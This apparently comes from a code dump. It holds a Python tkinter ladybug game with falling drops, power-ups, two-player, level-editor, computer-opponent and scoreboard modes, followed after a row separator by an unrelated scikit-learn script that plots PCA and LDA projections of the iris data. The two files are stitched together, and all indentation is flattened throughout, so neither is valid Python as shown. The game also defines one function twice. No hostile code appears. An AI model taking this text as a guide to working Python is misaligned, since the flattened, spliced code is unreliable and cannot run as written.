xPosition1 = random.randint(0,data.Player1Min-data.buffer)
xPosition2 = random.randint(data.Player1Max+data.buffer,
data.width +data.buffer)
data.coconuts.append(Coconuts(xPosition1,0))
data.coconuts.append(Coconuts(xPosition2,0))
xPosition4 = random.randint(data.Player1Min-data.buffer,
data.Player1Max+data.buffer)
data.coconuts.append(Coconuts(xPosition4,0))
if data.time %5 ==0:
xPosition3 = random.randint(0, data.Player1Min-data.buffer)
data.coconuts.append(Coconuts(xPosition3,0))
if data.time % int(24/data.level) ==0:
side = random.choice(data.sides)
if side == "l":
data.coconuts.append(Coconuts(data.Player1Min,0))
elif side =="r":
data.coconuts.append(Coconuts(data.Player1Max,0))
powerUpCoconutShot(data)
def powerUpCoconutShot(data):
#adds powerUps
#magic #s toallow for powerups to be added at different times
if data.time % 60 == 0 and data.time%120 !=0:
Position = random.choice(data.spotList)
data.powerUps.append(PowerUps(Position,0))
if data.time%50 == 0:
Position = random.choice(data.spotList)
data.invincible.append(Invincible(Position,0))
if data.time %100==0:
Position = random.choice(data.spotList)
data.scaryBug.append(ScaryBug(Position,750))
def playerKeyPressed(event,data):
if data.level<data.levelMax and event.keysym == "r": init(data)
if (event.keysym == "Left") and data.cx>=data.Player1Min+(data.lane/2):
data.cx -=(data.lane)/2
elif(event.keysym == "Right") and data.cx<=data.Player1Max:
data.cx +=(data.lane)/2
if data.level >= data.levelMax:
#enter name for scoreboard
if len(event.keysym) ==1:
if len(data.name) <15:
data.name += event.keysym
if event.keysym=="BackSpace":
data.name = data.name[0:-1]
if event.keysym == "Return":
data.scoreList += ((data.score, data.name))
#saves file
writeFile("score.txt",
data.savedScores+str(data.score)+","+data.name+"\n")
data.mode ="scoreboard"
def playerMousePressed(event, data): checkHome(event, data)
def playerTimerFired(data):
#actually pauses, and moves drops/player
if data.hit== False and data.level<data.levelMax:
data.cy-=data.speed
if data.time%5 ==0: data.score +=data.level
if data.cy < 15: #basically made it to the top
data.level +=1
data.cy = data.Player1Max + 10
data.speed +=2
if data.cy>40: #so drops you can't see don't hit you
data.time +=1
if data.pauseDrops !=True: coconutShot(data)
for powerUp in data.powerUps: powerUp.onTimerFired(data)
hitPause(data)
for powerUp in data.invincible: powerUp.onTimerFired(data)
hitInvincible(data)
for bug in data.scaryBug: bug.onTimerFired(data)
hitScaryBug(data)
for coconut in data.coconuts:
# only want drops to move if not paused
if data.pauseDrops == False: coconut.onTimerFired(data)
if data.beInvincible == False:hit(data)
if data.start != None:
if abs(data.start-data.cy) >= 120:
#to limit time for powerups to be active
data.pauseDrops, data.beInvincible = False, False
def playerRedrawAll(canvas, data):
# magic #s mainly for screen placement
canvas.create_image(data.width/2, data.height/2, image=data.background)
canvas.create_line(0,20, data.width, 20)
for coconut in data.coconuts: coconut.draw(canvas)
drawPowerups(canvas, data)
canvas.create_image(data.cx, data.cy, image=data.ladyBug)
canvas.create_text(data.width/6,50, text ="Level: %d" %data.level,
font = "Arial 18 bold", fill = "yellow")
canvas.create_text(data.width/6,80, text ="Score: %d" %data.score,
font = "Arial 18 bold", fill = "yellow")
canvas.create_text(2*data.width/3,660,
text ="""The greater the level, the more points get
added to your score!""",
font = "Arial 15 bold", fill = "yellow")
if data.hit== True:
canvas.create_rectangle(0,0,data.width, data.height, fill = "black")
canvas.create_image(data.width/2, data.height/2, image=data.deadScreen)
canvas.create_text(data.width/2,data.height/4,
text = "You Lose! Better Luck Next Time!",
font = "Helvetica 23 bold", fill = "yellow")
canvas.create_text(data.width/2,280, text ="Score: %d" %data.score,
font = "Arial 13 bold", fill = "yellow")
if data.level >= 8: madeIt(canvas, data)
drawHome(canvas, data)
def madeIt(canvas, data):# magic #s mainly for screen placement
canvas.create_rectangle(0,0, data.width, data.height, fill = "black")
canvas.create_image(data.width/2, data.height/2, image=data.winScreen)
canvas.create_image(300, 320, image=data.winBug)
canvas.create_text(data.width/2,70, text = "You Made it!",
font = "Arial 23 bold", fill = "yellow")
canvas.create_text(data.width/2,100, text ="Score: %d" %data.score,
font = "Arial 15 bold", fill = "yellow")
canvas.create_text(data.width/2,375, text ="Congrats! Enter your Name!",
font = "Arial 15 bold", fill = "yellow")
canvas.create_rectangle(data.width/2 - 50, 400, data.width/2+50, 450,
fill = "white")
canvas.create_text(data.width/2, 425, text = data.name)
####################################
# 2Player mode
####################################
def drop2Player(data):
#adds drops when not paused
#magic #s are position of where drops are starting
if data.winner ==None and data.pauseDrops == False:
if data.time%15==0:
xPosition1 = random.randint(0,385)
if abs(xPosition1 - 100)>25 and abs(xPosition1 - 360)>25:
#so random drops don't interfere with the lane ones
if data.pause1Drop != True:
data.coconuts1.append(Coconuts(xPosition1,0))
if data.pause2Drop != True:
data.coconuts2.append(Coconuts(xPosition1 +410,0))
if data.time % 12 ==0:
side = random.choice(data.sides)
if side == "l":
if data.pause1Drop != True:
data.coconuts1.append(Coconuts(140,0))
if data.pause2Drop != True:
data.coconuts2.append(Coconuts(540,0))
elif side =="r":
if data.pause1Drop !=True:data.coconuts1.append(Coconuts(344,0))
if data.pause2Drop!=True:data.coconuts2.append(Coconuts(755,0))
powerupDrop2Player(data)
def powerupDrop2Player(data):
#adds powerups on both screens (in the same position)
if data.time % 45 == 0 and data.time%90 !=0:
#randomize placement
side = random.choice(data.sides)
if side == "l":
if data.pause1Drop!=True:data.powerUps.append(PowerUps(140,0))
if data.pause2Drop!=True:data.powerUps.append(PowerUps(540,0))
elif side =="r":
if data.pause1Drop!=True:data.powerUps.append(PowerUps(344,0))
if data.pause2Drop!=True:data.powerUps.append(PowerUps(755,0))
if data.time%60 == 0:
side = random.choice(data.sides)
if side == "l":
if data.pause1Drop!=True:data.invincible.append(Invincible(140,0))
if data.pause2Drop!=True:data.invincible.append(Invincible(540,0))
elif side =="r":
if data.pause1Drop!=True:data.invincible.append(Invincible(344,0))
if data.pause2Drop!=True:data.invincible.append(Invincible(755,0))
if data.time %90==0:
side = random.choice(data.sides)
if side == "l":
data.scaryBug.append(ScaryBug(140,750))
data.scaryBug.append(ScaryBug(540,750))
elif side =="r":
data.scaryBug.append(ScaryBug(344,750))
data.scaryBug.append(ScaryBug(755,750))
def twoPlayerKeyPressed(event,data):
# controllers for both bugs
if event.keysym == "r": init(data)
if data.winner==None:
if (event.keysym == "a") and data.onLeft1==False:
data.onLeft1 = True
data.player1X = 150
if(event.keysym == "d") and data.onLeft1== True:
data.onLeft1 = False
data.player1X = 330
if (event.keysym == "Left") and data.onLeft2==False:
data.onLeft2 = True
data.player2X = 550
if(event.keysym == "Right") and data.onLeft2 == True:
data.onLeft2 = False
data.player2X = 750
def twoPlayerMousePressed(event, data):
checkHome(event, data)
def twoPlayerTimerFired(data):
if data.winner == None:
data.player1Y-=data.speed
#<15 signifies that lady bug reached the top
if data.player1Y < 15 and data.player2Y >15:
data.winner= "player1"
if data.player1Y>40:
data.time +=1
drop2Player(data)
data.player2Y-=data.speed
if data.player2Y < 15 and data.player1Y> 15:
data.winner= "player2"
if data.player2Y>40:
data.time +=1
drop2Player(data)
if data.player1Y < 15 and data.player2Y <15:
data.winner = "tie"
for powerUp in data.powerUps: powerUp.onTimerFired(data)
hitPause(data)
for powerUp in data.invincible:powerUp.onTimerFired(data)
hitInvincible(data)
for bug in data.scaryBug:bug.onTimerFired(data)
hitScaryBug(data)
powerupTimerFired(data)
def powerupTimerFired(data):
for coconut in data.coconuts1:
if data.pause1Drop == False:
coconut.onTimerFired(data)
hit2Player(data)
for coconut in data.coconuts2:
if data.pause2Drop == False:
coconut.onTimerFired(data)
if data.start1 != None:
# to make powerups only active for set amount of time
if abs(data.start1-data.player1Y) >= 120:
data.pause1Drop = False
data.Invincible1 = False
if data.start2 != None:
if abs(data.start2-data.player2Y) >= 120:
data.pause2Drop = False
data.Invincible2 = False
def twoPlayerRedrawAll(canvas, data):
#magic #s for placement on screen
canvas.create_image(data.width/4, data.height/2, image=data.halfBackground)
canvas.create_image(3*data.width/4, data.height/2,image=data.halfBackground)
canvas.create_line(data.width/2, 0, data.width/2, data.height, width = 10)
canvas.create_line(0,20, data.width, 20)
for coconut in data.coconuts1: coconut.draw(canvas)
for coconut in data.coconuts2: coconut.draw(canvas)
drawPowerups(canvas, data)
canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)
canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)
canvas.create_text(50,40, text = "Player 1",font = "Arial 15 bold",
fill = "yellow")
canvas.create_text(450,40, text = "Player 2",font = "Arial 15 bold",
fill = "yellow")
winner(canvas, data)
drawHome(canvas, data)
def winner(canvas, data):
if data.winner== "player1":
canvas.create_rectangle(0,0, data.width, data.height, fill = "black")
canvas.create_image(data.width/2, data.height/2, image=data.winScreen)
canvas.create_image(300, 320, image=data.winBug)
canvas.create_text(data.width/2,100, text = "You Made it! Player 1",
font = "Arial 23 bold", fill = "yellow")
elif data.winner== "player2":
canvas.create_rectangle(0,0, data.width, data.height, fill = "black")
canvas.create_image(data.width/2, data.height/2, image=data.winScreen)
canvas.create_image(300, 320, image=data.winBug)
canvas.create_text(data.width/2,100, text = "You Made it! Player 2",
font = "Arial 23 bold", fill = "yellow")
elif data.winner== "tie":
canvas.create_rectangle(0,0, data.width, data.height, fill = "black")
canvas.create_image(data.width/2, data.height/2, image=data.winScreen)
canvas.create_image(300, 320, image=data.winBug)
canvas.create_text(data.width/2,100, text = "Tie! You Both Made it!",
font = "Arial 23 bold", fill = "yellow")
####################################
# editor mode
####################################
def editorKeyPressed(event,data):
if event.keysym == "r": init(data)
def editorMousePressed(event, data):
#check for click on button for your speed
checkHome(event, data)
if data.easyY-data.r<= event.y <= data.easyY +data.r:
if data.easyX-2*data.r<= event.x<=data.easyX+2*data.r:
data.yourSpeed = "slow"
data.slow = data.click
data.medium, data.fast = data.notClick, data.notClick
if data.medX-2*data.r<= event.x<=data.medX+2*data.r:
data.yourSpeed = "medium"
data.medium = data.click
data.slow, data.fast = data.notClick, data.notClick
if data.hardX-2*data.r<= event.x<=data.hardX+2*data.r:
data.yourSpeed = "fast"
data.fast = data.click
data.slow, data.medium = data.notClick, data.notClick
checkMiddle(event, data)
checkLast(event, data)
def checkMiddle(event, data):
#check for click on button for rain speed
if data.medX-data.r<= event.y <= data.medX + data.r:
if data.easyX-2*data.r<= event.x<=data.easyX+2*data.r:
data.rainSpeed = "drizzle"
data.drizzle = data.click
data.rain, data.thunderstorm = data.notClick, data.notClick
if data.medX-2*data.r<= event.x<=data.medX+2*data.r:
data.rainSpeed = "rain"
data.rain = data.click
data.drizzle, data.thunderstorm = data.notClick, data.notClick
if data.hardX-2*data.r<= event.x<=data.hardX+2*data.r:
data.rainSpeed = "thunderstorm"
data.thunderstorm = data.click
data.drizzle, data.rain = data.notClick, data.notClick
def checkLast(event, data):
#check for click on button for powerups
if data.last-data.r<=event.y<= data.last+data.r:
if data.easyY-2*data.r<= event.x<=data.easyY+2*data.r:
data.powerUpsEditor = True
data.yes, data.no = data.click, data.notClick
if data.last-2*data.r<= event.x<=data.last+2*data.r:
data.powerUpsEditor = False
data.no, data.yes = data.click, data.notClick
if data.enter == data.click:
if data.enterX-data.r<=event.y<=data.enterX+data.r:
if data.medX-2*data.r<= event.x<=data.medX+2*data.r:
data.mode="levelCreated"
def drawButtons(canvas, data):
#makes each button
data.font, data.fill = "Helvetica 13 bold", "yellow"
canvas.create_text(data.medX,data.YST, text= "Your Speed:",
font = data.font,fill =data.fill)
canvas.create_image(data.easyX,data.easyY, image = data.slow)
canvas.create_text(data.easyX,data.easyY, text="Slow", font = data.font)
canvas.create_image(data.medX,data.easyY, image = data.medium)
canvas.create_text(data.medX,data.easyY, text="Medium", font = data.font)
canvas.create_image(data.hardX,data.easyY, image = data.fast)
canvas.create_text(data.hardX,data.easyY, text="Fast",font = data.font)
canvas.create_image(data.easyX,data.medX, image = data.drizzle)
canvas.create_text(data.medX,data.RST, text= "Rain Speed:",
font = data.font,fill =data.fill)
canvas.create_text(data.easyX,data.medX, text="Drizzle",font = data.font)
canvas.create_image(data.medX,data.medX, image = data.rain)
canvas.create_text(data.medX,data.medX, text="Rain",font = data.font)
canvas.create_image(data.hardX,data.medX, image = data.thunderstorm)
canvas.create_text(data.hardX,data.medX, text="Heavy",font = data.font)
canvas.create_text(data.medX,data.PUT, text= "PowerUps?",
font = data.font,fill =data.fill)
canvas.create_image(data.easyY,data.last, image = data.yes)
canvas.create_text(data.easyY,data.last, text="Yes",font = data.font)
canvas.create_image(data.last,data.last, image = data.no)
canvas.create_text(data.last,data.last, text="No",font = data.font)
changeEnter(canvas, data)
def changeEnter(canvas, data):
#makes it so the enter button respond to click
if data.powerUpsEditor != None and data.yourSpeed != None and \
data.rainSpeed != None: data.enter = data.click
canvas.create_image(data.medX,data.enterX, image = data.enter)
canvas.create_text(data.medX,data.enterX, text="Enter",font = data.font)
def editorTimerFired(data):
data.editorTime += 1
if data.editorTime %2 ==0:
rainDrop(data)
for drop in data.editorDrops:
drop.onTimerFired(data)
def rainDrop(data):
#background drops
xPosition = random.randint(0,data.width)
data.editorDrops.append(Coconuts(xPosition,0))
def editorRedrawAll(canvas, data):
canvas.create_image(data.width/2, data.height/2, image=data.background)
canvas.create_image(data.width/2, data.height/2, image=data.tbg)
for drop in data.editorDrops:
drop.draw(canvas)
canvas.create_text(data.width/2, data.S_P -10, text = "Edit Your Level!",
font="Arial 23 bold", fill = "yellow")
drawButtons(canvas, data)
drawHome(canvas, data)
####################################
# levelCreated mode
####################################
def setEverything(data):
#customizing game
if data.yourSpeed == "slow": data.speed = 6
elif data.yourSpeed == "medium": data.speed = 10
elif data.yourSpeed == "fast": data.speed = 14
if data.rainSpeed == "thunderstorm": data.rSpeed = 7
elif data.rainSpeed == "rain": data.rSpeed = 10
elif data.rainSpeed == "drizzle": data.rSpeed = 13
def levelCoconutShot(data):
#adding drops
if data.levelEditorLives >0:
if data.time%int(0.35*data.rSpeed) == 0:
xPosition1 = random.randint(0,data.Player1Min-data.buffer)
xPosition2 = random.randint(770, 870)
xPosition3 = random.randint(220,770)
data.coconuts.append(Coconuts(xPosition3,0))
data.coconuts.append(Coconuts(xPosition1,0))
data.coconuts.append(Coconuts(xPosition2,0))
if data.time % int(0.55*data.rSpeed) ==0:
xPosition3 = random.randint(0, 220)
xPosition5 = random.randint(220,770)
data.coconuts.append(Coconuts(xPosition3,0))
data.coconuts.append(Coconuts(xPosition5,0))
if data.time % int(data.rSpeed) ==0:
side = random.choice(data.sides)
if side == "l":
data.coconuts.append(Coconuts(3*data.width/8-20,0))
elif side =="r":
data.coconuts.append(Coconuts(7*data.width/8+40,0))
xPosition4= random.randint(220,770)
data.coconuts.append(Coconuts(xPosition4,0))
levelPowerUp(data)
def levelPowerUp(data):
# adding power-ups only if clicked yes
if data.powerUpsEditor == True:
if data.time % 20 == 0 and data.time%40 !=0:
Position = random.choice(data.spotList)
data.powerUps.append(PowerUps(Position,0))
if data.time%30 == 0:
Position = random.choice(data.spotList)
data.invincible.append(Invincible(Position,0))
if data.time %35==0:
Position = random.choice(data.spotList)
data.scaryBug.append(ScaryBug(Position,750))
def levelCreatedKeyPressed(event,data):
if event.keysym == "r": init(data)
if data.levelEditorLives>0:
if (event.keysym == "Left") and data.cx>=317:
data.cx -=(data.lane/2)
elif(event.keysym == "Right") and data.cx<=740:
data.cx +=(data.lane/2)
def levelCreatedMousePressed(event, data):
checkHome(event, data)
def levelCreatedTimerFired(data):
setEverything(data)
if data.levelEditorLives>0:
data.cy-=data.speed
if data.cy < 15:
data.level +=1
if data.cy>40:
data.time +=1
if data.pauseDrops !=True: levelCoconutShot(data)
if data.powerUpsEditor == False:
for coconut in data.coconuts: coconut.onTimerFired(data)
hit(data)
if data.powerUpsEditor == True:
for powerUp in data.powerUps: powerUp.onTimerFired(data)
hitPause(data)
for powerUp in data.invincible: powerUp.onTimerFired(data)
hitInvincible(data)
for bug in data.scaryBug: bug.onTimerFired(data)
hitScaryBug(data)
for coconut in data.coconuts:
if data.pauseDrops == False:coconut.onTimerFired(data)
if data.beInvincible == False: hit(data)
if data.start != None:
#to make powerups only active for set amount of time
if abs(data.start-data.cy) >= 120:
data.pauseDrops, data.beInvincible = False, False
def levelCreatedRedrawAll(canvas, data):
canvas.create_image(data.width/2, data.height/2, image=data.background)
canvas.create_line(0,20, data.width, 20)
for coconut in data.coconuts: coconut.draw(canvas)
if data.powerUpsEditor == True: drawPowerups(canvas, data)
canvas.create_image(data.cx, data.cy, image=data.ladyBug)
canvas.create_text(data.width/6,100,
text ="Total Lives: %d" %data.levelEditorLives,
font = "Arial 20 bold", fill = "yellow")
canvas.create_text(data.width/2,660,
text ="""You lose a life for hitting a drop
& don't get eaten!""",
font = "Arial 15 bold", fill = "yellow")
if data.levelEditorLives <=0:
canvas.create_rectangle(0,0, data.width, data.height, fill = "black")
canvas.create_image(data.width/2, data.height/2, image=data.deadScreen)
canvas.create_text(data.width/2,data.height/4,
text = "You Lose! Better Luck Next Time!",
font = "Helvetica 23 bold", fill = "yellow")
if data.level > 1: winEditor(canvas, data)
drawHome(canvas, data)
def winEditor(canvas, data):
#screen for when you win
canvas.create_rectangle(0,0, data.width, data.height, fill = "black")
canvas.create_image(data.width/2, data.height/2, image=data.winScreen)
canvas.create_image(300, 320, image=data.winBug)
canvas.create_text(data.width/2,100, text = "You Made it!",
font = "Arial 23 bold", fill = "yellow")
####################################
# AI Difficulty Mode
####################################
def difficultyKeyPressed(event,data):
if event.keysym == "r": init(data)
def drawDifficulties(canvas, data):
canvas.create_text(data.medX,data.AITY, text= "Computer Difficulty:",
font="Arial 23 bold", fill = "yellow")
canvas.create_image(data.easyX, data.easyY, image=data.slow)
canvas.create_text(data.easyX,data.easyY, text="Easy")
canvas.create_image(data.medX, data.easyY, image=data.medium)
canvas.create_text(data.medX,data.easyY, text="Medium")
canvas.create_image(data.hardX, data.easyY, image=data.fast)
canvas.create_text(data.hardX,data.easyY, text="Hard")
if data.difficulty !=None:
data.enter = data.click
canvas.create_image(data.medX, data.enterY, image=data.enter)
canvas.create_text(data.medX,data.enterY, text="Enter")
def difficultyMousePressed(event, data):
#sets up buttons to customize
checkHome(event, data)
if data.easyY-data.r<= event.y <= data.easyY +data.r:
if data.easyX-2*data.r<= event.x<=data.easyX+2*data.r:
data.difficulty = data.difS
data.slow = data.click
data.medium, data.fast = data.notClick, data.notClick
if data.medX-2*data.r<= event.x<=data.medX+2*data.r:
data.difficulty = data.difM
data.medium = data.click
data.slow, data.fast = data.notClick, data.notClick
if data.hardX-2*data.r<= event.x<=data.hardX+2*data.r:
data.difficulty = data.difH
data.fast = data.click
data.slow, data.medium = data.notClick, data.notClick
if data.enter == data.click:
if data.enterY-data.r<=event.y<=data.enterY+data.r:
if data.medX-2*data.r<= event.x<=data.medX+2*data.r:
data.mode="AI"
def difficultyTimerFired(data):
# makes normal background rain
data.editorTime += 1
if data.editorTime %2 ==0:
rainDrop(data)
for drop in data.editorDrops:
drop.onTimerFired(data)
def rainDrop(data):
xPosition = random.randint(0,data.width)
data.editorDrops.append(Coconuts(xPosition,0))
def difficultyRedrawAll(canvas, data):
canvas.create_image(data.width/2, data.height/2, image=data.background)
canvas.create_image(data.width/2, data.height/2, image=data.tbg)
for drop in data.editorDrops:
drop.draw(canvas)
drawDifficulties(canvas, data)
drawHome(canvas, data)
####################################
# AI mode
####################################
def hitAI1(data, distance):
for coconut in data.coconutsAI1:
# so AI switches by itself
if (data.player1Y-data.r - coconut.y<=distance) and \
data.switchOnProgress == False:
if coconut.x>=data.player1X-data.r and \
coconut.x<=data.player1X+data.r or AISwitchBug(data,distance)==True:
testInt = random.randint(0,9)
# to have different levels of difficulty
if testInt<= data.difficulty:
data.switchOnProgress= True
if data.player1X == 150:
data.player1X = 340
else:
data.player1X = 150
data.switchOnProgress= False
if coconut.y>=data.player1Y-data.r and coconut.y<=data.player1Y+data.r:
if coconut.x>=data.player1X-data.r and \
coconut.x<=data.player1X+data.r:
data.player1Y+=50
data.coconutsAI1.remove(coconut)
def AISwitchBug(data, distance):
#AI to move for spider
for scaryBug in data.scaryBug:
if (data.player1Y-data.r - scaryBug.y<=distance) and \
data.switchOnProgress == False:
if scaryBug.x>=data.player1X-data.r and \
scaryBug.x<=data.player1X+data.r:
return True
def hitAI2(data, distance):
# check if human controlled player hits drops
for coconut in data.coconutsAI2:
if coconut.y>=data.player2Y-data.r and coconut.y<=data.player2Y+data.r:
if coconut.x>=data.player2X-data.r and \
coconut.x<=data.player2X+data.r:
data.player2Y+=50
data.coconutsAI2.remove(coconut)
def coconutShotAI(data):
if data.winner ==None:
# randomize position of drops off of tree
if data.time%15==0:
xPosition1 = random.randint(0,385)
if abs(xPosition1 - 100)>40 and abs(xPosition1 - 360)>40:
if data.pause1Drop != True:
data.coconutsAI1.append(Coconuts(xPosition1,0))
if data.pause2Drop != True:
data.coconutsAI2.append(Coconuts(xPosition1 +410,0))
if data.time%8 ==0:
xPosition2 = random.randint(0,80)
xPosition3 = random.randint(364, 385)
if data.pause1Drop != True:
data.coconutsAI1.append(Coconuts(xPosition2,0))
data.coconutsAI1.append(Coconuts(xPosition3,0))
if data.pause2Drop != True:
data.coconutsAI2.append(Coconuts(xPosition2+410,0))
data.coconutsAI2.append(Coconuts(xPosition3+410,0))
addExtraCoconut(data)
addPowerUpsAI(data)
def addExtraCoconut(data):
#adds drops to edges of trees
if data.time % (18) ==0:
side = random.choice(data.sides)
if side == "l":
if data.pause1Drop != True:
data.coconutsAI1.append(Coconuts(140,0))
if data.pause2Drop != True:
data.coconutsAI2.append(Coconuts(540,0))
elif side =="r":
if data.pause1Drop != True:
data.coconutsAI1.append(Coconuts(344,0))
if data.pause2Drop != True:
data.coconutsAI2.append(Coconuts(755,0))
if data.time % 37 == 0:
side = random.choice(data.sides)
if side == "l":
if data.pause1Drop != True:
data.powerUps.append(PowerUps(140,0))
if data.pause2Drop != True:
data.powerUps.append(PowerUps(550,0))
elif side =="r":
if data.pause1Drop != True:
data.powerUps.append(PowerUps(344,0))
if data.pause2Drop != True:
data.powerUps.append(PowerUps(755,0))
def addPowerUpsAI(data):
#randomly add powerups on tree
if data.time%33 == 0:
side = random.choice(data.sides)
if side == "l":
if data.pause1Drop != True:
data.invincible.append(Invincible(140,0))
if data.pause2Drop != True:
data.invincible.append(Invincible(550,0))
elif side =="r":
if data.pause1Drop != True:
data.invincible.append(Invincible(344,0))
if data.pause2Drop != True:
data.invincible.append(Invincible(755,0))
if data.time %66==0:
side = random.choice(data.sides)
if side == "l":
data.scaryBug.append(ScaryBug(140,750))
data.scaryBug.append(ScaryBug(550,750))
elif side =="r":
data.scaryBug.append(ScaryBug(344,750))
data.scaryBug.append(ScaryBug(750,750))
def AIKeyPressed(event,data):
if event.keysym == "r": init(data)
if data.winner==None:
if (event.keysym == "Left") and data.onLeft1==False:
data.onLeft1 = True
data.player2X = 550
elif(event.keysym == "Right") and data.onLeft1== True:
data.onLeft1 = False
data.player2X = 750
def AIMousePressed(event, data): checkHome(event, data)
def AITimerFired(data):
if data.winner == None:
#want to check hit twice (before & after elements move)
if data.Invincible1 == False:hitAI1(data, 31)
if data.Invincible2 == True: pass
elif data.Invincible2 == False:hitAI2(data, 31)
for coconut in data.coconutsAI1:
if data.pause1Drop == False:coconut.onTimerFired(data)
for coconut in data.coconutsAI2:
if data.pause2Drop == False:coconut.onTimerFired(data)
# second check
if data.Invincible1 == False:hitAI1(data,13)
if data.Invincible2 == True:pass
elif data.Invincible2 == False:hitAI2(data,13)
data.player1Y-=data.speedAI
#establishing winer
if data.player1Y < 15 and data.player2Y >15: data.winner= "player1"
if data.player1Y>40:
data.time +=1
coconutShotAI(data)
data.player2Y-=data.speedAI
if data.player2Y < 15 and data.player1Y> 15: data.winner= "player2"
if data.player2Y>40:
data.time +=1
coconutShotAI(data)
if data.player1Y < 15 and data.player2Y <15: data.winner = "tie"
for powerUp in data.powerUps: powerUp.onTimerFired(data)
hitPause(data)
powerUpAITimerFired(data)
def powerUpAITimerFired(data):
#moves both sides symmetrically
for powerUp in data.invincible:
powerUp.onTimerFired(data)
hitInvincible(data)
for bug in data.scaryBug:
bug.onTimerFired(data)
hitScaryBug(data)
if data.start1 != None:
if abs(data.start1-data.player1Y) >= 120:
data.pause1Drop = False
data.Invincible1 = False
if data.start2 != None:
if abs(data.start2-data.player2Y) >= 120:
data.pause2Drop = False
data.Invincible2 = False
def AIRedrawAll(canvas, data):
canvas.create_image(data.width/4, data.height/2, image=data.halfBackground)
canvas.create_image(3*data.width/4, data.height/2,image=data.halfBackground)
canvas.create_line(data.width/2, 0, data.width/2, data.height, width = 10)
canvas.create_line(0,20, data.width, 20)
for coconut in data.coconutsAI1:
coconut.draw(canvas)
for coconut in data.coconutsAI2:
coconut.draw(canvas)
canvas.create_text(50,40, text = "Computer",font = "Arial 15 bold",
fill = "yellow")
canvas.create_text(450,40, text = "Player 1",font = "Arial 15 bold",
fill = "yellow")
drawPowerups(canvas, data)
canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)
canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)
AIWinner(canvas, data)
drawHome(canvas, data)
def AIWinner(canvas, data):
if data.winner== "player1":
canvas.create_rectangle(0,0, data.width, data.height, fill = "black")
canvas.create_image(data.width/2, data.height/2, image=data.winScreen)
canvas.create_image(300, 320, image=data.winBug)
canvas.create_text(data.width/2,100, text = "The Computer Won :(",
font = "Arial 23 bold", fill = "yellow")
elif data.winner== "player2":
canvas.create_rectangle(0,0, data.width, data.height, fill = "black")
canvas.create_image(data.width/2, data.height/2, image=data.winScreen)
canvas.create_image(300, 320, image=data.winBug)
canvas.create_text(data.width/2,100, text = "You Made it! You Won!",
font = "Arial 23 bold", fill = "yellow")
elif data.winner== "tie":
canvas.create_rectangle(0,0, data.width, data.height, fill = "black")
canvas.create_image(data.width/2, data.height/2, image=data.winScreen)
canvas.create_image(300, 320, image=data.winBug)
canvas.create_text(data.width/2,100, text = "Tie! You Both Made it!",
font = "Arial 23 bold", fill = "yellow")
####################################
# ScoreBoard mode
####################################
def scoreboardKeyPressed(event, data):
if event.keysym == "r": init(data)
def scoreboardMousePressed(event, data): checkHome(event, data)
def scoreboardTimerFired(data):
difficultyTimerFired(data)
def scoreboardRedrawAll(canvas, data):
canvas.create_image(data.width/2, data.height/2, image=data.background)
canvas.create_image(data.width/2, data.tbgY, image=data.tbg)
for drop in data.editorDrops:
drop.draw(canvas)
canvas.create_text(data.width/2, data.txtTScore, text="Top Scores!",
font = "Arial 30 bold", fill = "yellow")
canvas.create_text(data.width/2, data.S_P, text="Score_Player",
font = "Arial 20 bold", fill = "yellow")
drawHome(canvas, data)
#reads file
data.savedScores
data.savedScores=readFile("score.txt")
score=data.savedScores.splitlines()
scores=[]
for line in score:
scores.append(line.split(","))
#sorts scores to find top 5
scores = sorted(scores, key = lambda x: int(x[0]))
top5 = scores[-data.numScores:]
top5.reverse()
for i in range(len(top5)):
canvas.create_text(data.width/2, data.scoreShift+(i*50),
text = top5[i],
font = "Arial 18 bold", fill = "yellow")
####################################
# help mode
####################################
def helpKeyPressed(event, data):
if event.keysym == "r": init(data)
def helpMousePressed(event, data): checkHome(event, data)
def helpTimerFired(data):
difficultyTimerFired(data)
def helpRedrawAll(canvas, data):
canvas.create_image(data.width/2, data.helpY, image=data.helpScreen)
for drop in data.editorDrops:
drop.draw(canvas)
drawHome(canvas, data)
#######################################
# use the run function as-is from notes
#######################################
def run(width=15000, height=25000):
def redrawAllWrapper(canvas, data):
canvas.delete(ALL)
redrawAll(canvas, data)
canvas.update()
def mousePressedWrapper(event, canvas, data):
mousePressed(event, data)
redrawAllWrapper(canvas, data)
def keyPressedWrapper(event, canvas, data):
keyPressed(event, data)
redrawAllWrapper(canvas, data)
def timerFiredWrapper(canvas, data):
timerFired(data)
redrawAllWrapper(canvas, data)
# pause, then call timerFired again
canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)
# Set up data and call init
class Struct(object): pass
data = Struct()
data.width = width
data.height = height
data.timerDelay = 100 # milliseconds
# create the root and the canvas
root = Tk()
init(data)
canvas = Canvas(root, width=data.width, height=data.height)
canvas.pack()
# set up events
root.bind("<Button-1>", lambda event:
mousePressedWrapper(event, canvas, data))
root.bind("<Key>", lambda event:
keyPressedWrapper(event, canvas, data))
timerFiredWrapper(canvas, data)
# and launch the app
root.mainloop() # blocks until window is closed
print("bye!")
run(1000, 1000)
|
471 | d0448ca8e3fd2f3bb8a3a7ec052e29ab0be6351a | import matplotlib.pyplot as plt
from sklearn.decomposition import PCA
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
import pandas as pd
import numpy as np
from sklearn import datasets
from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split
# a = pd.read_csv('sample20170117_labeled_0207.csv')
# X = a.values[0: 100, 0: 110]
# y = a.values[0: 100, 110]
# y = np.array([1 if i == 1. else -1 for i in y])
iris = datasets.load_iris()
X = iris.data
y = iris.target
target_names = iris.target_names
# X, y = make_classification(n_samples=1000, n_features=100, n_classes=2)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)
pca = PCA(n_components=2)
X_r = pca.fit(X).transform(X)
lda = LinearDiscriminantAnalysis(n_components=2)
X_r2 = lda.fit(X, y).transform(X)
plt.figure()
colors = ['navy', 'turquoise', 'darkorange']
lw = 2
for color, i, target_name in zip(colors, [0, 1, 2], target_names):
plt.scatter(X_r[y == i, 0], X_r[y == i, 1], color=color, alpha=.8, lw=lw, label=target_name)
plt.legend(loc='best', shadow=False, scatterpoints=1)
plt.title('pca')
plt.figure()
for color, i, target_name in zip(colors, [0, 1, 2], target_names):
plt.scatter(X_r2[y == i, 0], X_r2[y == i, 1], alpha=.8, color=color, label=target_name)
